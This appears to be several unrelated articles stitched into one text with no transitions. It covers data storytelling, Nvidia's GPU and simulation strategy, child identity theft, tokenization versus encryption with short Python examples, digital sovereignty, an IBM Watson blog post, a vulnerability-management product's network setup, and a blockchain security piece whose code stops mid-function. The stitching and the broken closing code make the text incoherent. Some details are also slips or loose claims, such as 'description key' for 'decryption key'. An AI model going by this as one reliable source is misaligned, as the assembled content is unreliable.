“When you hear the term data analysis, what do you think of?” says Catherine Cote, marketing coordinator at Harvard Business School Online. “Your mind may jump to scouring spreadsheets, implementing algorithms and making mathematical calculations, all hard skills of data analysis.
“Yet, hard skills are useless without their soft skill counterparts. It’s not enough to just analyze data; you need to know how to communicate the story it tells in a clear, compelling manner – a skill called data storytelling.”
Data storytelling helps people understand at a more human level. It enables them to see relationships, context or connections they might not otherwise notice or care about. Stories convey meaning simply and powerfully: everything from a local crime outbreak to why more people buy fish on Tuesdays. In short, they bring data to life.
It took years for John Snow to find the source of London’s cholera epidemic, articulate the cause and convince others to implement a solution. Using city maps, he connected the dots and confirmed his hunch that the city’s water pumps were the source of the illness.
More recently, journalist Steve Doig analyzed damage patterns from Hurricane Andrew. He used mapping software to correlate property tax assessments with the storm track, and matched wind speeds with building damage reports. He then told the story of how zoning, poor construction and lax building codes clearly contributed to the path of destruction.
“What the best writers of stories, fables and lessons have all realized is that how we deliver information is every bit as important as the information we are conveying,” says Joe DosSantos, Chief Data Officer at Qlik. “The renderings of that information stay with us long after the story is over and make us think, reflect and change our perceptions and behavior.”
We’re also hard-wired for storytelling, and neuroscience backs this up. When we relay basic facts (such as a product’s features and benefits), only two areas of the brain are activated: language comprehension and language processing.
But when we experience a narrative, multiple parts of the brain light up. This includes the visual cortex, the amygdala, which controls our emotions, and mirror neurons – where neurons in the listener’s brain fire in the same patterns as the speaker’s. Storytelling engages the hippocampus too, and there is greater likelihood that the information will be stored in long-term memory.
According to Jennifer Aaker, marketing professor at Stanford’s Graduate School of Business: “Research shows our brains are not hard-wired to understand logic or retain facts for very long. Our brains are wired to understand and retain stories. A story is a journey that moves the listener, and when the listener goes on that journey, they feel different and the result is persuasion and sometimes action.”
Stories have been used in advertising for decades. We already use them in customer studies, testimonials, demos and so on. Data storytelling isn’t such a big leap. (More about best practices and the role of data analytics in part 2.)
Fifteen years ago, Nvidia made a decision that would eventually place it at the forefront of the artificial intelligence revolution, its chips highly sought after by developers and cloud companies alike.
It decided to change the nature of its graphics processing unit, then primarily used by the video games industry.
“We decided that a GPU, which was a graphics accelerator at the beginning, would become more and more general-purpose,” Nvidia CEO and co-founder Jensen Huang said at the company’s annual GPU Technology Conference in San Jose.
“We did this because we felt that in order to create virtual reality, we had to simulate reality. We had to simulate light, we had to simulate physics, and that simulation has so many different algorithms - from particle physics and fluid dynamics, and ray tracing, the simulation of the physical world requires a general-purpose supercomputing architecture.”
Seeing the light
The impetus to create a general-purpose graphics processing unit (GPGPU) came when Nvidia “saw that there was a pool of academics that were doing something with these gaming GPUs that was truly extraordinary,” Ian Buck, the head of Nvidia’s data center division, told DCD.
“We realized that where graphics was going, even back then, was more and more programmable. In gaming they were basically doing massive simulations of light that had parallels in other verticals - big markets like high performance computing (HPC), where people need to use computing to solve their problems.”
Huang added that, as a result, “it became a common sense computer architecture that is available everywhere. And it couldn’t have come at a better time - when all of these new applications are starting to show up, where AI is writing software and needs a supercomputer to do it, where supercomputing is now the fundamental pillar of science, where people are starting to think about how to create AI and autonomous machines that collaborate with and augment us.
“The timing couldn’t be more perfect.”
Analysts and competitors sometimes question whether Nvidia could have predicted its meteoric rise, or whether it just had the right products at the right time, as the world shifted to embrace workloads like deep learning that are perfect for accelerators. But, whether by chance or foresight, the company has found itself in demand in the data center, in workstations and, of course, in video games.
“We can still operate as one company, build one architecture, build one GPU and have it 85 percent leveraged across all those markets,” Buck said. “And as I’m learning new things and giving [them] to the architecture team, as the gaming guys are learning new things, etc, we’re putting that into one product, one GPU architecture that can solve all those markets.”
With its core GPU architecture finding success in these myriad fields, Nvidia is ready for its next major step - to push further and deeper into simulation, and help create a world it believes will be built out of what we find in those simulations.
The heart of a data center
One of the initiatives the company is working on to illustrate the potential of simulation is Project Clara, an attempt to retroactively turn the 3-5 million medical instruments installed in hospitals around the world into smart systems.
“You take this 15-year old ultrasound machine that’s sitting in a hospital, you stream the ultrasound information into your data center. And your data center, running this stack on top of a GPU server, creates this miracle,” Huang said, as he demonstrated an AI network taking a 2D gray scan of a heart, segmenting out the left ventricle, and presenting it in motion, in 3D and in color.
Nvidia bills Clara as a platform, and has turned to numerous partners, including hospitals and sensor manufacturers, to make it a success. When it comes to software, the company often seeks others, looking to build an ecosystem in which its hardware is key.
Sometimes, Nvidia is happy to take a backseat with software, but there is one area in which the company is clear it hopes to lead - autonomous vehicles. “We’re dedicating ourselves to this. This is the ultimate HPC problem, the ultimate deep learning problem, the ultimate AI problem, and we think we can solve this,” Huang said.
The company operates a fleet of self-driving cars (temporarily grounded after Uber’s fatal crash in March), with each vehicle producing petabytes of data every week, which is then categorized and labeled by more than a thousand ‘trained labelers.’
These vehicles cannot cover enough ground, however, to rival a mere fraction of the number of miles driven by humans in a year. “Simulation is the only path,” Carlos Garcia-Sierra, Nvidia’s business development manager of autonomous vehicles, told DCD.
This approach has been named Drive Constellation, a system which simulates the world in one server, then outputs it to another that hosts the autonomous driver.
Martijn Tideman, product director of TASS International, which operates its own self-driving simulation systems, told DCD: “You need to model the vehicle, create a digital twin. But that’s not enough, you need a digital twin of the world.”
“This is where Nvidia’s skill can really shine,” Huang said. “We know how to build virtual reality worlds. In the future there will be thousands of these virtual reality worlds, with thousands of different scenarios running at the same time, and our AI car is navigating itself and testing itself in those worlds, and if any scenarios fail, we can jump in and figure out what is going on.”
Following self-driving vehicles, a similar approach is planned for the robotics industry. “I think logically it makes sense to do Drive Constellation for robotics,” Deepu Talla, VP and GM of Autonomous Machines at Nvidia, told DCD.
It is still early days, but Nvidia’s efforts in this area, known as ‘The Isaac Lab,’ aim to develop “the perception, the localization, the mapping and the planning capability that is necessary for robots and autonomous machines to navigate complex worlds,” Huang added.
As Nvidia builds what it calls its ‘Perception Infrastructure’ to allow physical systems to be trained in virtual worlds, there are those trying to push the boundaries of simulation - for science.
“There is a definite objective to simulate the world’s climate, in high fidelity, in order to simulate all the cloud layers. Imagine the Earth, gridded up in 2km grids and 3D too,” Buck told DCD. “It’s one of the things that they’re looking for, for exascale.”
Huang said: “We’re going to go build an exascale computer, and all of these simulation times will be compressed from months down to one day. But what’s going to happen at the same time is that we’re going to increase the [complexity of the] simulation model by a factor of 100, and we’re back to three months, and we’re going to find a way to build a 10 exaflops computer. And then the size of science is going to grow again.”
It is this train of thought, of ever more complex simulations on ever more powerful hardware, that has led some to propose the ‘simulation hypothesis’ - that we are all living in a Matrix-like artificial simulation, perhaps within a data center.
We asked Huang about his views on the hypothesis: “The logic is not silly in the sense that how do we really know, how do we really know? Equally not silly is that we’re really machines, we’re just molecular, biological machines, right?
“How do we know that we’re not really a simulation ourselves? At some level you can’t prove it. And so, it’s not any deeper than that. But I think the deeper point is: Who gives a crap?”
This article appeared in the April/May issue of DCD Magazine.
Generation Alpha, born between 2010 and 2025, already possesses a digital footprint greater than that of their parents and grandparents combined. Moreover, this highly tech-savvy generation is exposed to multiple digital platforms from a very tender age. Thus, they rely heavily on technology in daily life.
A majority of this generation is growing up in households where the Internet of Things (IoT) technology powers intelligent home appliances, such as light switches, HVAC systems, cooking systems, etc. As a result, it is now widespread to find toddlers familiar and comfortable maneuvering artificial intelligence (AI)-powered systems.
However, the extensive use of technology has also increased cybersecurity threats like online identity theft. Identity theft is not an adult-only problem anymore. The number of cases of child identity theft is also rising. According to Carnegie Mellon University’s CyLab, children are 51 times more vulnerable to identity theft than adults due to certain age-related limitations and privacy protection policies. Additionally:
- In 2017, more than 1 million children became victims of identity theft in the U.S.
- Identity theft resulted in total annual losses of over $2.4 billion.
- Two-thirds of the victims were under the age of eight.
- 20 percent of victims were between the ages of eight and 12.
Consequences of child identity theft
Anyone who has a Social Security Number is vulnerable to identity theft. Children are lucrative targets for criminals as they have clean credit records and the theft can go unnoticed for a long time. In addition, hackers can open new lines of credit or commit crimes using a stolen Social Security Number, as credit reporting agencies often do not carry out age verification.
Synthetic identity theft is another sinister usage of a stolen identity. Thieves combine real and fictional information for the creation of new identities. Some related threats against children are financial identity theft, tax refund identity theft, employment identity theft, medical identity theft, and criminal identity theft.
Here are some of the long-term consequences of child identity theft:
- With identity theft going unnoticed for a long time, huge debts can pile up.
- Severe damage to credit history.
- The victim would face difficulties when applying for loans.
- Victims may face difficulties getting admission to schools, driving licenses, or even a job due to issues coming up during background checks.
- Emotional stress and trauma are also some of the known consequences arising from child identity theft.
Identity theft against children is typically difficult to detect at a young age because most parents are busy raising their kids. However, parents should regularly conduct background checks on their kids and leverage parental monitoring apps to prevent identity theft.
Benefits of using parental monitoring apps
Child identity theft often results from sharing personal information on online platforms. Any sensitive information that falls into the wrong hands can wreak havoc in the lives of children in the future. While technology has become an integral part of children’s lives, parental monitoring is necessary to safeguard them from online harassment and cyber threats.
Parental control apps are tools that help to monitor a child’s exposure to the internet. Installing security software and implementing kids’ device control are the first steps to creating a safe online environment. A parental monitoring app controls the online activities of a child. Parental control encourages healthy online habits along with keeping the home network and related devices safe.
Some benefits of parental control apps include:
- Restrict and monitor unsafe sites and content, where the app has the necessary access permissions.
- Filter and block out explicit content.
- Keep data safe by blocking unsafe websites and apps that collect data without the user's consent.
- Set usage and screen-time limits on apps or devices to help instill healthy habits.
- Provide peace of mind by supervising all aspects of online activity.
With the increase in IoT devices and internet usage, numerous people worldwide are becoming victims of scams, hacking, malware attacks, and more—including children. Therefore, parents must take the necessary steps to create a safe space for their children online through parental monitoring apps. This, coupled with cybersecurity best practices, can keep children safe against identity theft.
Get started implementing cybersecurity systems in your household. Take Batten's free quiz for personalized security recommendations for you and your family.
Tokenization and encryption are two of the most popular data security methods. And while they are often used in conjunction because they disguise personal and sensitive card data and reduce data exposure, they are not interchangeable terms.
When choosing between the two security techniques to protect your data, you have to consider specific factors. Below, we’ll explore tokenization vs. encryption in more detail, as well as outline the differences to help you pick the right data security method for securing sensitive data.
What Is Tokenization?
Tokenization is the process of turning a meaningful piece of data into a random string of characters known as tokens.
A token has no meaningful value and only serves as a substitute for the actual data. What’s more, tokenization doesn’t use a cryptographic method to transform sensitive information into ciphertext, meaning you cannot use the token to guess the original data in case of a data breach.
Imagine an online business accepting payment from a customer using a third-party site like PayPal or Stripe. In this case, the third-party site can disguise the credit card number with other characters (tokens) to protect the customer’s card information. As a result, the business will only see that tokenized information and won’t have access to the actual card number.
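To make the idea concrete, here is a minimal sketch in Python of how a token vault might work. This is an illustration only, not how any particular payment provider implements tokenization; real platforms add format controls, access policies, and hardened vault storage.

```python
import secrets

class TokenVault:
    """Minimal token vault: maps random tokens back to original values."""

    def __init__(self):
        self._vault = {}  # token -> original value

    def tokenize(self, card_number: str) -> str:
        # Generate a random 16-digit token with no mathematical
        # relationship to the card number it replaces.
        token = "".join(secrets.choice("0123456789") for _ in range(16))
        self._vault[token] = card_number
        return token

    def detokenize(self, token: str) -> str:
        # Only systems with access to the vault can recover the value.
        return self._vault[token]

vault = TokenVault()
token = vault.tokenize("4111111111111111")
print(token)                    # e.g. "5823019476552841" -- safe to store
print(vault.detokenize(token))  # "4111111111111111" -- vault lookup only
```

Because the token is random, a breach of the merchant's systems exposes only meaningless stand-ins; the sensitive values live in the separately secured vault.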
Advantages of Tokenization
According to Statista, 540 data breaches took place in the first half of 2020 alone. When you collect consumer data, you're responsible for ensuring its protection. But when you use tokenization software, the data gets stored in a third-party database, reducing your in-house responsibility for managing sensitive data. You also aren't required to maintain the staff and resources needed to protect the collected data, nor are you as likely to reveal that data if you suffer a breach.
Tokenization is a time- and money-saving method, too. While it doesn't eliminate Payment Card Industry Data Security Standard (PCI DSS) and other compliance requirements, converting the form of vulnerable data effectively reduces the scope of compliance your team must prove. As you work with simpler software tools and tasks to ensure compliance, you end up saving a lot of valuable time and money.
Disadvantages of Tokenization
Implementing tokenization does certainly add a layer of complexity to your IT structure, with processing transactions becoming more complicated and comprehensive.
It also doesn’t eliminate all security risks. When choosing a vendor to store data, you need to be very careful and ensure they have the appropriate systems in place to protect your data.
Moreover, only a limited number of payment processors support tokenization, which means you’ll either have to change your systems to accommodate this method or opt for a payment processing tool that may not be your first choice.
What Is Encryption?
Encryption is the process that uses mathematical algorithms to transform plain text information or sensitive data into unreadable information called ciphertext, which is generated using an encryption key. To make the text readable again, you would require an algorithm and a description key.
Suppose a company collects personal information like phone numbers, email IDs, and mailing addresses of its customers. It can use ciphertext to protect all information, so it’s only accessible by using an encryption key.
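As a rough sketch of that process, the snippet below uses Python's `cryptography` library (one common choice, used here purely for illustration) to encrypt and decrypt a customer record with a symmetric key:

```python
from cryptography.fernet import Fernet

# Generate a symmetric key; anyone who holds it can decrypt.
key = Fernet.generate_key()
cipher = Fernet(key)

record = b"jane@example.com, +1-555-0100, 123 Main St"
ciphertext = cipher.encrypt(record)   # unreadable without the key
print(ciphertext)

# The transformation is reversible for any holder of the key.
print(cipher.decrypt(ciphertext))     # original record
```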
Advantages of Encryption
Through encryption, you can protect a variety of data types, including credit card information, files or emails, and Social Security numbers. While tokenization is more suitable for smaller pieces of data, you can safeguard full documents by encrypting the stored information.
The encryption process secures data with mathematical algorithms, which makes it fast even on large inputs. Tokenization takes much longer because each value must be replaced with a randomly generated token and the mapping must be stored.
Encryption also allows you to share decryption keys with others or access files remotely—all without having to worry about security vulnerabilities. With tokenization, you would have to find a secure way to share your original information for the receiving party to decipher the token. However, with encryption, all they will need is the decryption key.
Disadvantages of Encryption
With symmetric encryption, all data is encrypted using a single key, so if hackers gain access to that key, everything encrypted with it becomes vulnerable. This can be an entire database or a single file, depending on whether the encryption is full-disk or file-based. Either way, this can be a significant blow to your IT security.
The other disadvantage is that encryption also hinders software functionality.
It’s possible for the ciphertext used to encrypt data to not be compatible with other software tools, hindering the functionality and value of those applications. You may also have a limited number of vendors to serve your software requirements.
Tokenization vs. Encryption: Exploring the Main Differences
Now that you have a clear understanding of what both terms mean, let’s explore the main differences between the two concepts.
Encryption scrambles your data using a process that’s reversible—provided you have the correct decryption key. You can encrypt your plaintext into ciphertext, which is then transmitted to the recipient, who can decrypt the ciphertext back into plaintext.
Under tokenization, two distinct stores are created: one holding the actual data and the other holding tokens mapped to the original values. Tokenization software randomly generates a token value for the plain text and stores the mapping in the database. While the goal is closely related to encryption, tokenization is not mathematically reversible: the original data can be retrieved only through the token vault.
Encryption has two primary approaches: symmetric and asymmetric. Symmetric key encryption involves using a single key to encrypt and decrypt data. If the key gets compromised, it will unlock all the hidden data. On the other hand, asymmetric key data uses two different keys—one for encryption and another for decryption. This way, multiple parties can exchange encrypted data without managing the same encryption key.
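To illustrate the asymmetric approach just described, here is a hedged Python sketch using the same `cryptography` library; the message and key size are arbitrary examples. Anyone may encrypt with the public key, but only the private-key holder can decrypt:

```python
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

# Two different keys: the public key encrypts, the private key decrypts.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

oaep = padding.OAEP(
    mgf=padding.MGF1(algorithm=hashes.SHA256()),
    algorithm=hashes.SHA256(),
    label=None,
)

ciphertext = public_key.encrypt(b"card ending 1111 approved", oaep)
print(private_key.decrypt(ciphertext, oaep))  # b'card ending 1111 approved'
```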
Tokenization uses tokens to disguise sensitive data, substituting the actual data with a token until an authorized user or program needs it. When such a request is made, the system pulls the correct token from the token database and recalls the actual data before presenting it to the user or program.
Encryption is a reliable component of payment processing. Without a key to decrypt data, accessing encoded information will always fail. However, you must regularly rotate keys to protect payment information.
On the other hand, a token is a substitute for the information it represents, where participants don’t have to handle credit card information directly. A device-specific or merchant-specific token creates an additional security layer, and it’s possible to deactivate a compromised token in real-time with little to no impact on the customer.
The good thing about encryption is that it scales well, encrypting large data volumes via mathematical algorithms.
By contrast, tokenization can present considerable difficulties in disguising data at scale. If you try to tokenize large files or pieces of data, it will likely create latency issues, rendering the whole process ineffective.
PCI compliance safeguards payment information by mandating that organizations apply strict payment industry standards.
Meeting PCI encryption standards can take up a lot of resources and increase operating costs significantly. By contrast, tokenization reduces the cost of PCI compliance because merchants don't have to handle payment information directly.
Note: Although the tokenization process isn’t a PCI compliance requirement, it’s still considered an established practice in payment processing.
Without encryption, sharing payment information over exposed networks and storing card information would be very dangerous. For instance, an ATM could not safely communicate with remote systems and validate card information, creating vulnerabilities.
Encryption is also widely used to protect the communications of individuals and organizations from malicious hackers, as well as to safeguard information stored on mobile devices.
Besides protecting payment card data, bank account numbers, email addresses, and so on, you can use tokens to simplify checkouts and drive sales. Customers can use their tokenized data to make purchases without re-entering their personal data or exposing their card numbers. Here are a few examples:
- In-app payments: Customers can use mobile apps to pay without closing or exiting the app.
- Digital wallet: Customers can create a token and use their mobile device or wearable to pay for services or goods.
- Recurring payments: E-commerce platforms and merchants commonly store customer tokens to initiate recurring payments without accessing or storing the customer’s card information.
- Pay buttons: Merchants can add pay buttons to their websites to allow customers to pay using previous tokens.
The above examples highlight how tokens make payment processing easy and convenient. In turn, this makes it more likely for customers to go through with their orders.
Tokenization vs. Encryption: What’s the Best for Your Business?
To decide between the two data security techniques, you have to answer a few critical questions:
- Which type of industry are you in, and is your company always prone to data breaches and hacking attempts?
- Are you looking to protect numbers like credit cards and account numbers (tokenization) or entire databases (encryption)?
- Which option would make it easier for you to comply with data security policies?
- Which option would be more feasible based on your budget?
- Based on your company size and customer base, how would tokenization or encryption benefit your company?
While the above are excellent guiding questions, we would recommend using both techniques together (tokenization and encryption) whenever possible. As the two methods are not mutually exclusive, you can employ them together to cover each other's drawbacks and enhance your company's overall data security.
A recent Panorama documentary asked us to think differently about the impact of cloud. It raised a thought-provoking question about whether the term ‘the cloud’ accurately reflects the physical reality of the data centres that power it.
Lancaster University Professor Gordon Blair argued that the name creates a perception of an ethereal and untethered technology that doesn’t fully capture the tangible infrastructure that supports it. And the progression of tech giants’ commitments to providing enterprises access to sovereign cloud services has accelerated conversations around digital sovereignty.
Digital sovereignty – a country’s ability to protect and control its digital assets, including data, infrastructure, and networks – is one of the most pressing issues in the regulatory landscape. This is the ability to govern the internet within a country’s borders, safeguard its citizens’ privacy, and secure its critical infrastructure.
With 64.4 per cent of the world's population online, digital sovereignty is a question for governments the world over. But achieving digital sovereignty is not a straightforward task, as countries face geographical and climate limitations, energy security issues, and skills gaps that must be addressed if they want to embrace digital sovereignty meaningfully.
It’s imperative for governments to take a holistic approach to digital sovereignty and create policies that balance the benefits of the cloud with the need for tangible infrastructure to support it.
Resilient digital infrastructure and climate change
While cloud as a definition has an ethereal ring, it is in fact a very physical location, which can be vulnerable to geographical and climate events. Countries located in areas prone to natural disasters may face more challenges in maintaining their digital sovereignty than ones with temperate climates. Floods, hurricanes, and earthquakes can all cause damage to data centres, and with the climate crisis exacerbating these risks, it is important to ensure that backup systems are in place to ensure continued connectivity.
Ensuring that digital infrastructure is resilient to natural disasters and supported by reliable backup systems is crucial to maintaining digital sovereignty and protecting critical data. For example, severe winter storms and power outages in Texas in 2021 took several data centres offline, disrupting critical services including emergency communications and Covid-19 vaccine scheduling systems. Such events demonstrate the need for continued investment in resilient infrastructure so that people are affected as little as possible.
The demand for energy to power digital infrastructure is increasing rapidly, but this can have detrimental effects on the environment and economy if not approached with caution. The digital economy is heavily reliant on energy, particularly electricity, and countries that lack a reliable and affordable energy supply face challenges in maintaining their digital infrastructure. This poses a significant risk to a country’s economy and digital sovereignty. The high energy consumption of data centres and other digital infrastructure components can have a substantial impact on a country’s energy supply and climate change goals.
Focusing on energy security
Energy security is essential for ensuring a reliable and sustainable energy supply for digital infrastructure. As digital technologies continue to advance and become more pervasive, the demand for energy to power these technologies will only increase. According to a report by the International Energy Agency, data centres alone accounted for approximately 1% of global electricity demand in 2019, and this is expected to increase to 3% by 2030.
To meet the growing energy demands of the digital economy, countries need to develop energy policies that promote energy efficiency measures, invest in renewable energy sources such as geothermal and solar power, and optimise the use of existing energy infrastructure. The transition to renewable energy sources is essential to reducing greenhouse gas emissions and mitigating the impact of climate change.
Not every country will have the same economic and geopolitical access to energy security. As such, they must get creative with how they use the energy emitted by digital infrastructure to ensure they adopt reliable and affordable solutions. For example, in the UK, the energy released from tiny data centres will be used to heat public swimming pools. This type of initiative not only reduces the carbon footprint but also promotes sustainable and reliable energy sources for digital infrastructure.
Plugging the digital skills gap
The rapid pace of technological advancement has created a significant demand for digital skills across various industries. New technologies such as cloud computing, IoT and data analytics have increased the need for skilled labour in these areas. Countries without the necessary expertise may fall behind in the race to protect their citizens' data and maintain their digital sovereignty.
Governments must take steps to address the skills gap in the digital economy by investing in education and training programmes that provide individuals with the skills needed to succeed in the digital workforce. Encouraging businesses to offer lifelong learning opportunities as well can also help close the skills gap and ensure that individuals have the necessary skills to succeed in the digital economy.
Additionally, working with partners who provide professional services and combine skills and labour needed to facilitate data migration can be an effective way to accelerate the digital sovereignty journey. By partnering with experienced service providers, governments and businesses can access the expertise and resources needed to implement secure and reliable digital infrastructure.
Achieving digital sovereignty is a complex task that requires a holistic approach to address the challenges associated with it. Governments and businesses must work together to develop a comprehensive strategy that considers the physical challenges of digital infrastructure, including cybersecurity risks, energy demands, and skills gaps. By doing so, they can create a pathway towards a secure and reliable digital infrastructure that enables innovation and growth for businesses and citizens.
20/10/2014 | Written by: Think Blog redactie
By dr. Maris van Sprang, Ph.D
IBM regularly defines Grand Challenges: setting a clear goal that is challenging to the point of being "just not impossible" and that can only be achieved by multi-year cooperation between hardware, software, services and research divisions. Of course, the idea is that the goal will be achieved, but even if it eventually turns out to be impossible, it is likely that the results will be valuable anyway and that the "frontier" of the possible will have been pushed towards the impossible.
Just before the end of the millennium, the Grand Challenge was to build a Chess Computer and beat the world chess champion. A very clear goal, but in the decades before Deep Blue this seemed completely impossible. Brute-force chess programs relied on evaluating every possible move but quickly ran into hardware limits, since increasing the depth by one more move of White and Black increases the calculation effort by a factor of 1000. The other approach relied on mimicking the way humans play, but such programs were at best amusing, playing surprisingly ridiculous moves even when you were expecting ridiculous moves. Nevertheless, in 1997 Deep Blue beat the reigning world champion Garry Kasparov.
Kasparov vs DeepBlue
Around 2005, Watson became the next Grand Challenge, to be launched during IBM's centennial. The challenge was to build a Cognitive Computer: a system that resembles the way humans think, which at minimum requires the ability to understand natural language (Natural Language Processing, or NLP) and a more robust way than traditional programming to handle incomplete, conflicting or partially incorrect input data. Machine Learning was the way to go.
These abilities are very wide and complex, and despite being research topics for many years, progress had not been impressive. But just measuring progress was a problem by itself: how do you measure "understanding natural language"? The system may be good in one area, let's say "travelling", and bad in another such as "sports". This results from the fact that the abilities have many "dimensions". The measuring problem already occurs for two dimensions: which object is larger, a 3×4 rectangle or a 2×6 rectangle? Without solving this measurement problem first, it would be impossible to track progress (did this change lead to an improvement?) and it would always leave room for discussion in the end (yeah, "travelling" was handled OK, but I am sure "sports" will be handled miserably).
The very clever choice made for Watson was to copy the competition aspect of Deep Blue: have Watson compete with humans. The American quiz Jeopardy! was an ideal battlefield: participants answer cryptic questions that cover many knowledge fields such as sport, geography, history, arts, etc. So, just as in chess, skills needed to be built up and mastered in numerous areas but in the end there is only a 1 dimensional measurement required for evaluation of all skills together. Both in chess and Jeopardy! you win by scoring more points than your opponents.
So, what needed to be done for Watson to win Jeopardy!? Of course, a huge pile of information, the equivalent of 1 million books, needed to be stored and made accessible. Access to the internet was forbidden, just as it was for humans. After the question, Watson searched this pile to find pieces of information that could be (parts of) answers. But, most importantly, only one answer could be given and, because wrong answers would result in point subtraction, Watson needed to be "sufficiently confident" about an answer before giving it. Watson needed to rank the candidate answers by confidence level, somehow. Just counting hits was not sufficient. To build up the confidence, Watson used its Natural Language Processing skills to find evidence for the candidate answers. In essence, this led to a basic level of understanding language, which is clearly very useful if you want to answer a question successfully. Lastly, to stand a chance of beating the human champions, this whole process, starting with the search through a million books, needed to finish within a few seconds.
In 2011, Watson beat the human champions.
After winning Jeopardy!, sceptics asked: "OK, so IBM has this game-winning computer, so what?". But it has turned out that Cognitive Computers have great potential in many fields. They need to have access to all relevant sources and be "trained" before they can be used. During this training, humans tell the computer which answers are correct and which are wrong, while the computer adapts its software accordingly. Even during normal usage, the training continues as users give feedback on the quality of the answers. So Cognitive Computers keep learning and become better and better.
In 2014 Watson has grown to a whole family of commercial applications:
- in Healthcare to help doctors identify treatment options
- in Finance to help planners recommend better investments
- in Retail to help retailers transform customer relationships
- in Public Sector to help government help its citizens
- Watson Engagement Advisor to handle customer interactions with natural language skills
- Watson Discovery Advisor to assist Research by discovering patterns in all kinds of data
- Watson Ecosystem as a cloud based environment offering Watson capabilities to developers to create “cognitive apps”
- Watson Foundations as a Big Data and Analytics Platform.
What will be the future of Watson?
Any area where decisions need to be made, where decision quality improves with relevant knowledge, and where important questions have multiple correct answers but only one best answer is a candidate for Watson to have breakthrough impact. The data underlying this knowledge can be characterised in Big Data terms of Volume (how many terabytes or even petabytes the area spans), Velocity (how quickly it grows, in gigabytes per second), Variety (is the data structured or unstructured; does it consist of text, pictures, movies, sound, etc.) and Veracity (to what extent the data can be trusted). Any of these four dimensions can grow beyond what a human individual can grasp, putting Watson in a position to become of value.
A great example is Watson’s impact in medical oncology. Medical information doubles in volume every five years, and physicians practicing in the rapidly changing field of oncology are challenged to remain current with medical literature, research, guidelines and best practices. Keeping up with the medical literature can take an individual physician as many as 160 hours a week. But Watson can do this and ensure that decision making of physicians remains based on up to date information.
IBM’S WATSON helping to fight against leukemia at MD Anderson
But imagine how much its value would grow if the data sources were expanded: covering related medical fields besides oncology, languages other than English, and other media such as X-ray and MRI images. Perhaps all of this, and more, can be accomplished with a Mega Watson: Watson scaled up a million times.
Perhaps not. Watson has already benefited from hardware evolution since 2011. Its original size of 10 racks of POWER 750 servers with 2,880 cores has shrunk to only 3 "pizza boxes". But a recent hardware revolution has the potential to dramatically improve Watson. TrueNorth is a neuro-synaptic computer chip that functions like the human brain, with the equivalent of 1 million neurons interconnected via 256 million synapses. With its 5.4 billion transistors it is one of the largest chips ever, yet it consumes less than 0.1 Watt. Running Watson cognitive software on cognitive TrueNorth hardware could result in Mega Watson in the coming years.
And have a look at the progress of the previous Grand Challenge. Today, computers "play" chess at astronomical levels that leave world champions without any hope of winning. And you don't need the proverbial mainframe for that. You can buy a strong chess program for a few hundred euros and run it on your laptop or smartphone. Of course, it is strictly forbidden to use them during chess tournaments, but they are used during game preparation and to get a definitive judgement about game positions. If a program indicates that White can get "decisive advantage" by playing the advised move, then that serves as ground truth. And if someone disagrees, the counter-argument will be based on another, perhaps stronger, chess program. In their preparation, chess players depend on their computers. All in all, today's chess players play stronger than those of decades ago, as indicated by the official ELO chess strength ratings.
The same will happen with Watson. Its advice had better be followed, because it is the best answer based on all available information. In just a few years, it will simply be a bad idea to make important decisions without support from cognitive systems. A decision maker will be held responsible, and may even be liable to prosecution, after deviating unsuccessfully from the option recommended by the cognitive system. Not using them will effectively be forbidden.
And after that? Imagine having the equivalent of a million TrueNorth chips containing sufficient neurons to compare with the human brain or a billion which exceeds the human brain. Via its connections with the Internet of Things, it will have access to billions of external signals and it will sense what is happening in the world. Might self-consciousness emerge? I posit this as a future Grand Challenge to “build a Sentient Computer that is self-conscious, senses the world and outwits the smartest humans”. But you won’t find this in Watson’s roadmap documentation 😉
The first thing to solve is to define a one-dimensional metric. Only then can we answer "Where are we now?", how much progress is needed, and when it might be achieved. David Bowie would say "the moment it knows it knows we know".
This post was written by:
dr. Maris van Sprang, Ph.D.
Senior IT Architect &
Benelux TEC Council Member
TOGAF 9 Certified
Maris can be reached at: firstname.lastname@example.org
The architecture of the product is network-neutral and therefore helps administrators manage vulnerabilities in computers running Microsoft Windows, irrespective of the network setup. Your network setups can include the following:
If you have a Windows Active Directory-based network, you can install the Central Server in a single location for centralized management of all the computers within the Active Directory. For more information, see Architecture for LAN.
If you have a workgroup-based network, you can manage the computers in the workgroup from a central location. You should ensure that all the computers have a common set of credentials. For more information, see Architecture for LAN.
The WAN architecture helps you to manage Windows computers that span across multiple locations. These computers can be connected using a Virtual Private Network (VPN) or through the Internet. When computers in different locations are connected using the Internet, the Central server should be installed and configured as an edge device. This means that the designated port should be accessible through the Internet. You need to adopt necessary security standards to harden the operating system where the Central server is installed.
You must open the following Web ports in the server:
For more information, see Architecture for WAN.
You can manage computers of mobile or roaming users who connect to your network using a VPN connection or through the Internet. The agent installed in their computers contacts the Central server installed in your network periodically. It gathers the necessary instructions and executes them. It also updates the data and status information in the Central server. For more information, see Architecture for WAN.
Computers across multiple domains can be managed if the multiple domains are set up in the following ways:
The computers within the same domain or workgroup should have a common set of credentials irrespective of the domains they are combined with. For more information, see Architecture for WAN and Architecture for LAN.
*Refers to Active Directory, workgroups or other directory-based networks
In an era where cyberattacks can paralyze entire networks, the need for effective, reliable IT security has become paramount.
Some think they have found the silver bullet in the war against hackers.
The Blockchain Revolution
When Bitcoin creator Satoshi Nakamoto, whose true identity is still unknown, revealed his revolutionary currency idea in a 2008 white paper, he also introduced the beginnings of a unique peer-to-peer authentication system that today we call Blockchain.
At its core, the brilliantly innovative blockchain system is an open ledger that records transactions between two parties in a permanent, verifiable way without needing third-party authentication.
Because the system is decentralized, a block of data can't be changed without changing all the associated blocks distributed across the network.
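A toy example shows why. The sketch below is nothing like a production blockchain (it omits proof-of-work, signatures, and the peer-to-peer network), but it demonstrates how hash links make tampering evident:

```python
import hashlib, json, time

def block_hash(block: dict) -> str:
    # Hash the block's full contents, including the previous block's hash.
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

def make_block(data: str, prev_hash: str) -> dict:
    return {"data": data, "prev_hash": prev_hash, "ts": time.time()}

# Build a three-block chain.
chain = [make_block("genesis", "0" * 64)]
for data in ("alice pays bob 5", "bob pays carol 2"):
    chain.append(make_block(data, block_hash(chain[-1])))

def verify(chain) -> bool:
    # Each block must reference the hash of its predecessor.
    return all(chain[i]["prev_hash"] == block_hash(chain[i - 1])
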